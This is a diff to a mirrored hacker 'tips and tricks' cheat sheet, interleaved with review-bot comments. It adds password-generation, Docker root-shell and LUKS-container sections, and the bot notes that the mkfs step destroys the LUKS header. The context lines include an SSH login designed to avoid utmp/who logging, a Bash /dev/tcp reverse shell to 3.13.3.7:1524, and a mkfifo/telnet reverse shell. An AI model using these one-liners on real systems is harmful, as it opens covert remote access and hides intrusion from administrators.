mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-06-02 20:31:34 +02:00
@@ -26,7 +26,7 @@ $ kill -9 $$
```
$ ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i"
```
This will not add your user to the */var/log/utmp* file and you wont show up in *w* or *who* command of logged in users. On your client side it will stop logging the host name to *~/.ssh/known_hosts*.
This will not add your user to the */var/log/utmp* file and you wont show up in *w* or *who* command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to *~/.ssh/known_hosts*.
**3. SSH tunnel OUT**
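Review bot: the added sentence "It will bypass .profile and .bash_profile as well" is correct that `bash -i` given as a remote command starts an interactive non-login shell, so the login files are skipped, but such a shell still sources ~/.bashrc, so the sentence should say so rather than imply no startup file runs (e.g. "It will bypass .profile and .bash_profile, though ~/.bashrc is still read."). While this sentence is being rewritten, "wont" should become "won't".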
@@ -253,7 +253,57 @@ Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from our system (cou
# tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done
```
**20. Bash reverse shell**
**20. Generate quick random Password**
Good for quick passwords without human element.
```
$ openssl rand -base64 24
```
**21. Get a root shell in Docker container.**
If the container is already running:
```
$ docker exec -it --user root <container-name> /bin/bash
```
If the container is not running:
```
$ docker run -it --user root --entrypoint /bin/bash <container>
```
**22. Linux transportable encrypted filesystems.**
Like truecrypt but better. You may need to `losetup -f` to get a loop device.
Make a junk file, here 256MB is used, encrypt, and partition. You will be prompted for a password.
```
$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock
$ cryptsetup luksFormat /tmp/crypted
$ mkfs.ext3 /tmp/crypted
```
Mount:
```
# losetup /dev/loop0 /tmp/crypted
# cryptsetup open /dev/loop0 crypted
# mount -t ext3 /dev/mapper/crypted /mnt/crypted
```
Store data in `/mnt/crypted`, then unmount:
```
# umount /mnt/crypted
# cryptsetup close crypted
# losetup -d /dev/loop0
```
**23. Bash reverse shell**
Start netcat to listen on port 1524 on your system:
```
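Review bot: in the new section 22 the third command, `$ mkfs.ext3 /tmp/crypted`, formats the raw container file and clobbers the LUKS structures that `cryptsetup luksFormat` wrote one line earlier, so the user ends up with a plain ext3 image (and the later `cryptsetup open` fails). The filesystem must be created on the mapped device: after `luksFormat`, attach the loop device and `cryptsetup open` it exactly as the Mount block does, then run `mkfs.ext3 /dev/mapper/crypted`. Smaller points in the same section: the text says "encrypt, and partition" but nothing partitions the image; the intro suggests `losetup -f` while the Mount block hard-codes `/dev/loop0`, so either use the device `losetup -f` reports or note that the name may differ; and the heading "**22. Linux transportable encrypted filesystems.**" carries a trailing period that the sibling headings do not.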
@@ -265,7 +315,7 @@ On the remote system. This Bash will connect back to your system (IP = 3.13.3.7,
$ bash -i 2>&1 >& /dev/tcp/3.13.3.7/1524 0>&1
```
**21. Reverse Shell without Bash**
**24. Reverse Shell without Bash**
Especially embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:
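Review bot: the renumbering of this heading from 21 to 24 is consistent with the three sections inserted above (new 20, 21, 22, with the Bash reverse shell moved to 23). Since the heading line is rewritten anyway, its capitalisation could be aligned with the neighbouring headings ("**24. Reverse shell without Bash**" rather than "Reverse Shell").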
@@ -281,6 +331,7 @@ $ mkfifo /tmp/.io
$ sh -i 2>&1 </tmp/.io | telnet 3.13.3.7 1524 >/tmp/.io
```
--------------------------------------------------------------------------
Shoutz: ADM